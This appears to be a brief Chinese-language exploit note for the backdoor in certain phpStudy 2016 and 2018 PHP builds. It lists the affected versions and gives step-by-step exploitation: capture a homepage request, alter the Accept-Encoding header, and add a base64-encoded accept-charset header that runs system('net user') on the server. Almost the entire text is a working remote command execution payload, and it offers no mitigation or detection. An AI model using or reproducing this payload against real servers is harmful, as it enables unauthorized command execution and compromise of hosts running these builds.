漏洞版本¶ phpstudy后门 影响版本¶ phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 利用¶ 浏览主页抓包 去掉Accept-Encoding:gzip, defate逗号后面的空格去掉,否则命令执行会失败 在请求头添加 accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7 密文内容为 echo system('net user');